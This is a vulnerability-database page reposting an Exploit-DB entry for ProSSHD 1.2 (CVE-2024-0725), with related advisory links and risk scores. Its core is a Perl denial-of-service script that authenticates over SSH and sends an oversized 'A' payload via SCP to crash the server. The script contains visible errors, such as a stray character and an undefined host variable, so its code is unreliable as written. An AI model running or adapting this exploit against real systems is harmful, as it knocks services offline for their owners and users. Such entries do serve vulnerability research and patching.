Lucene search
K

ProSSHD 1.2 20090726 - Denial of Service (DoS)

🗓️ 09 Jun 2025 00:00:00Reported by Fernando MengaliType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 276 Views

ProSSHD 1.2 20090726 vulnerable to Denial of Service exploit by Fernando Mengali on Windows XP.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-0725
19 Jan 202419:26
circl
CNNVD
ProSSHD Security Vulnerabilities
19 Jan 202400:00
cnnvd
CVE
CVE-2024-0725
19 Jan 202417:31
cve
Cvelist
CVE-2024-0725 ProSSHD denial of service
19 Jan 202417:31
cvelist
Exploit DB
ProSSHD 1.2 - Denial of Service (DOS)
2 Apr 202500:00
exploitdb
EUVD
EUVD-2024-16515
3 Oct 202520:07
euvd
NVD
CVE-2024-0725
19 Jan 202418:15
nvd
Prion
Design/Logic Flaw
19 Jan 202418:15
prion
Positive Technologies
PT-2024-15783 · Prosshd · Prosshd
19 Jan 202400:00
ptsecurity
RedhatCVE
CVE-2024-0725
23 May 202507:25
redhatcve
Rows per page
# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)
# Google Dork: N/A
# Date: 13 january 2024
# Exploit Author: Fernando Mengali
# Vendor Homepage: https://prosshd.com/
# Software Link: N/A
# Version: 1.2 20090726
# Tested on: Windows XP
# CVE: CVE-2024-0725

    $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {s
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();

print "\t    ==> Connecting to webserver... \n\n";
sleep(1);

my $i=0;
    print "\t    ==> Exploiting... \n\n";

my $payload  = "\x41" x 500;

$connection2 = Net::SSH2->new();
$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";
$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$scpget = $connection2->scp_get($payload);
$connection2->disconnect();

print "\t    ==> Done! Exploited!";
   sub intro {
      print q {

	                            ,--,
	                     _ ___/ /\|
	                 ,;'( )__, )  ~
	                //  //   '--; 
	                '   \     | ^
	                     ^    ^

	    [+] ProSSHD 1.2 20090726 - Denial of Service (DoS)

	    [*] Coded by Fernando Mengali

	    [@] e-mail: [email protected]

      }
  }

  sub main {

our ($ip, $port, $username, $password) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port> <username> <password>           \n";
        exit(-1);

      }
  }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jun 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.15.3 - 7.5
CVSS 25
CVSS 35.3
EPSS0.02033
SSVC
276